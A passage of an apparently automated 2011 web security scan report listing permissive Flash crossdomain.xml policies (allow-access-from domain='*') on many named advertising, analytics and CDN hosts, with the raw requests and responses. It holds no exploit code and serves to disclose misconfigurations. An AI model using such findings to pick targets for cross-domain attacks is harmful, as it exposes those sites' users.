Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 21:42:14 GMT
Date: Sat, 17 Sep 2011 16:23:42 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...
5.12. http://ad.turn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Sat, 17 Sep 2011 16:37:01 GMT
Content-Type: text/xml;charset=UTF-8
Date: Sat, 17 Sep 2011 16:37:00 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>
5.13. http://admin.brightcove.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admin.brightcove.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: admin.brightcove.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "4fbbc6624625a7f4c2704c08908b31df:1283167753"
Last-Modified: Mon, 30 Aug 2010 11:29:13 GMT
Accept-Ranges: bytes
Content-Length: 386
Content-Type: application/xml
Cache-Control: max-age=1200
Date: Sat, 17 Sep 2011 16:38:34 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<!-- Note: secure=false is confusing, but basically its saying
to allow SSL connections. Their reasoning is something
abo
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...
5.14. http://admonkey.dapper.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admonkey.dapper.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: admonkey.dapper.net

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Sat, 17 Sep 2011 16:44:35 GMT
Content-Type: application/xml
Connection: close
Last-Modified: Tue, 03 Aug 2010 09:20:10 GMT
ETag: "3d1f458-ca-48ce7d2dee680"
Accept-Ranges: bytes
Content-Length: 202
Vary: Accept-Encoding

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...
5.15. http://ads.amgdgt.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.amgdgt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.amgdgt.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 21 May 2010 08:32:40 GMT
ETag: "85814f-12e-4871688bd9a00"
Cache-Control: max-age=21600
Expires: Sat, 17 Sep 2011 22:25:23 GMT
Content-Type: text/xml
Content-Length: 302
Date: Sat, 17 Sep 2011 16:45:16 GMT
X-Varnish: 1731774803 1731750635
Age: 1193
Via: 1.1 varnish
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-from domain="all" />
...[SNIP]...
5.16. http://ads.undertone.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.undertone.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.undertone.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 09 Sep 2011 21:28:46 GMT
ETag: "30b0406-fc-4ac88dcc0df80"
Content-Type: text/xml
Date: Sat, 17 Sep 2011 16:44:05 GMT
Content-Length: 252
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.undertone.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...
5.17. http://ads.yldmgrimg.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.yldmgrimg.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.yldmgrimg.net

Response

HTTP/1.0 200 OK
Last-Modified: Mon, 19 Oct 2009 20:41:08 GMT
ETag: "YM:1:f3afab59-44f8-4ca0-8b65-b58ac0bf0f75-gzip"
Content-Type: text/xml
Server: YTS/1.17.24
x-ysws-request-id: 54b5af01-e8c8-4c8a-af70-d0fab89b709a
Cache-Control: max-age=315129301
Expires: Sun, 12 Sep 2021 00:18:11 GMT
Date: Sat, 17 Sep 2011 16:23:10 GMT
Content-Length: 403
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...
5.18. http://adserver.teracent.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: adserver.teracent.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"373-1310680427000"
Last-Modified: Thu, 14 Jul 2011 21:53:47 GMT
Content-Type: application/xml
Content-Length: 373
Date: Sat, 17 Sep 2011 16:26:34 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
   <sit
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...
5.19. http://adsfac.us/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adsfac.us
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: adsfac.us

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 30 Sep 2008 00:31:21 GMT
Accept-Ranges: bytes
ETag: "0291dc9322c91:0"
Server: Microsoft-IIS/7.0
P3P: CP="NOI DSP COR CUR PSA OUR BUS UNI NAV INT"
Date: Sat, 17 Sep 2011 16:38:20 GMT
Connection: close
Content-Length: 125

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" secure="true" />
</cross-domain-policy>

5.20. http://adunit.cdn.auditude.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adunit.cdn.auditude.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: adunit.cdn.auditude.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=345600
Content-Type: text/x-cross-domain-policy
Date: Sat, 17 Sep 2011 16:23:16 GMT
ETag: "1376296382"
Expires: Wed, 21 Sep 2011 16:23:16 GMT
Last-Modified: Wed, 19 May 2010 16:53:13 GMT
Server: ECS (sjo/5227)
X-Cache: HIT
Content-Length: 265
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...
5.21. http://afe.specificclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://afe.specificclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: afe.specificclick.net

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Content-Type: text/xml
Content-Length: 194
Date: Sat, 17 Sep 2011 16:23:45 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>
5.22. http://ajax.googleapis.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ajax.googleapis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ajax.googleapis.com

Response

HTTP/1.0 200 OK
Expires: Sun, 18 Sep 2011 14:18:56 GMT
Date: Sat, 17 Sep 2011 14:18:56 GMT
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=86400
Age: 8218

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...
5.23. http://amch.questionmarket.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: amch.questionmarket.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:37:28 GMT
Server: Apache/2.2.3
Last-Modified: Tue, 28 Mar 2006 15:45:05 GMT
ETag: "e0686c83-d1-4100ff999c240"
Accept-Ranges: bytes
Content-Length: 209
Keep-Alive: timeout=5, max=402
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>


<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
    <allow-access-from domain="*" />
</cross-domain-
...[SNIP]...
5.24. http://analytics.newsinc.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.newsinc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: analytics.newsinc.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/xml
Date: Sat, 17 Sep 2011 16:23:17 GMT
ETag: "b485279b64cb1:0"
Last-Modified: Tue, 05 Oct 2010 14:38:51 GMT
NDN-Server: Ana03
NDN-SiteVer: 3.0
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 286
Connection: Close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<allow-ht
...[SNIP]...
5.25. http://api.zap2it.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.zap2it.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.zap2it.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 23 May 2008 16:32:22 GMT
ETag: "13d8b5-c9-5fcf1180"
Accept-Ranges: bytes
Content-Length: 201
Content-Type: application/xml
Cache-Control: max-age=10800
Expires: Sat, 17 Sep 2011 19:23:30 GMT
Date: Sat, 17 Sep 2011 16:23:30 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...
5.26. http://as1.suitesmart.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as1.suitesmart.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: as1.suitesmart.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 17 Feb 2011 00:10:45 GMT
ETag: "19e27-ca-49c6f3a952b40"
Accept-Ranges: bytes
Content-Length: 202
Content-Type: text/xml
Date: Sat, 17 Sep 2011 16:39:32 GMT
Connection: close
Cache-Control: no-store

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...
5.27. http://assets.newsinc.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://assets.newsinc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: assets.newsinc.com

Response

HTTP/1.1 200 OK
x-amz-id-2: ef25XRx8OixCbWBVj1UzC/EnjfkDUqn2fpZRrKhbt1dXLYBk4XXkYqIRTIPXCmyS
x-amz-request-id: B920D3BE7919D8A2
Date: Sat, 17 Sep 2011 16:23:20 GMT
Last-Modified: Mon, 26 Oct 2009 18:52:29 GMT
ETag: "9a2df4412dfbe178fccafc4915ad186e"
Accept-Ranges: bytes
Content-Type: text/xml
Content-Length: 335
Connection: keep-alive
Server: AmazonS3

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-polici
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...
5.28. http://b.rad.msn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.rad.msn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.rad.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: text/xml
Last-Modified: Fri, 22 Jul 2011 17:49:14 GMT
Accept-Ranges: bytes
ETag: "0c969ab9748cc1:0"
Server: Microsoft-IIS/7.5
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Access-Control-Allow-Origin: *
Date: Sat, 17 Sep 2011 16:29:19 GMT
Connection: keep-alive
Content-Length: 202

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...
5.29. http://b.scorecardresearch.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 07 Jul 2011 18:29:25 GMT
Content-Type: application/xml
Expires: Sun, 18 Sep 2011 16:23:09 GMT
Date: Sat, 17 Sep 2011 16:23:09 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...
5.30. http://bh.contextweb.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bh.contextweb.com

Response

HTTP/1.1 200 OK
Server: GlassFish v3
Accept-Ranges: bytes
ETag: W/"269-1314729061000"
Last-Modified: Tue, 30 Aug 2011 18:31:01 GMT
Content-Type: application/xml
Content-Length: 269
Date: Sat, 17 Sep 2011 16:31:13 GMT
Connection: Keep-Alive
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
               <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...
5.31. http://bs.serving-sys.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bs.serving-sys.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=2592000
Content-Type: text/xml
Last-Modified: Thu, 21 Aug 2008 15:23:00 GMT
Accept-Ranges: bytes
ETag: "0e2c3cba13c91:0"
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 17 Sep 2011 16:23:45 GMT
Connection: close
Content-Length: 100

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>

5.32. http://c.brightcove.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.brightcove.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c.brightcove.com

Response

HTTP/1.1 200 OK
X-BC-Client-IP: 50.23.123.106
X-BC-Connecting-IP: 50.23.123.106
Last-Modified: Fri, 09 Sep 2011 02:01:13 UTC
Cache-Control: must-revalidate,max-age=0
Content-Type: application/xml
Content-Length: 116
Date: Sat, 17 Sep 2011 16:38:02 GMT
Connection: keep-alive
Server:

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*" secure="false" />
</cross-domain-policy>
5.33. http://c.delish.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.delish.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c.delish.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, proxy-revalidate, no-store
Pragma: no-cache
Content-Type: text/xml
Last-Modified: Mon, 13 Dec 2010 19:41:52 GMT
Accept-Ranges: bytes
ETag: "0034cafd9acb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 17 Sep 2011 16:21:11 GMT
Connection: keep-alive
Content-Length: 109

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
5.34. http://c.msn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.msn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, proxy-revalidate, no-store
Pragma: no-cache
Content-Type: text/xml
Last-Modified: Fri, 05 Nov 2010 18:44:56 GMT
Accept-Ranges: bytes
ETag: "044698a197dcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 17 Sep 2011 16:29:03 GMT
Connection: keep-alive
Content-Length: 109

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
5.35. http://cache.specificmedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache.specificmedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cache.specificmedia.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:23:55 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n30 ( lax-agg-n43), ht-d lax-agg-n43.panthercdn.com
Cache-Control: max-age=604800
Expires: Wed, 21 Sep 2011 07:37:24 GMT
Age: 290791
Content-Length: 194
Content-Type: text/xml
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>
5.36. http://cdn.eyewonder.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.eyewonder.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.eyewonder.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=3600
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "b2ae8e693141c91:17da"
Server: Microsoft-IIS/6.0
p3p: policyref="/100125/w3c/p3p.xml", CP="NOI DSP LAW NID PSA OUR IND NAV STA COM"
X-Powered-By: ASP.NET
Age: 1009
Date: Sat, 17 Sep 2011 16:38:52 GMT
Last-Modified: Fri, 07 Nov 2008 23:34:43 GMT
Expires: Sat, 17 Sep 2011 17:22:03 GMT
Content-Length: 195
Connection: close

<?xml version="1.0"?>
<!-- http://cdn.eyewonder.com-->
<cross-domain-policy>
<allow-access-from domain="*" />
<site-control permitted-cross-domain-policies="all"/>
</cross-domain-policy>
5.37. http://cdn.turn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.turn.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Pragma: private
Content-Type: text/xml;charset=UTF-8
Cache-Control: private, max-age=0
Expires: Sat, 17 Sep 2011 16:37:32 GMT
Date: Sat, 17 Sep 2011 16:37:32 GMT
Content-Length: 100
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>
5.38. http://ce.lijit.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ce.lijit.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ce.lijit.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:31:12 GMT
Server: PWS/1.7.3.6
X-Px: ms sea-ag1-n11 ( sea-ag1-n1), ht sea-ag1-n1.panthercdn.com
ETag: "f211e-83-4ac74a1592380"
Cache-Control: max-age=604800
Expires: Tue, 20 Sep 2011 12:54:55 GMT
Age: 358577
Content-Length: 131
Content-Type: application/xml
Last-Modified: Thu, 08 Sep 2011 21:20:30 GMT
Connection: close

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*"/>
</cross-domain-policy>
5.39. http://cn1.kaboodle.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cn1.kaboodle.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cn1.kaboodle.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
ETag: W/"200-1315340584000"
Last-Modified: Tue, 06 Sep 2011 20:23:04 GMT
Content-Type: application/xml
Content-Length: 200
Date: Sat, 17 Sep 2011 16:30:35 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
5.40. http://cn2.kaboodle.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cn2.kaboodle.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cn2.kaboodle.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
ETag: W/"200-1315340584000"
Last-Modified: Tue, 06 Sep 2011 20:23:04 GMT
Content-Type: application/xml
Content-Length: 200
Date: Sat, 17 Sep 2011 16:30:40 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
5.41. http://cn3.kaboodle.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cn3.kaboodle.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cn3.kaboodle.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
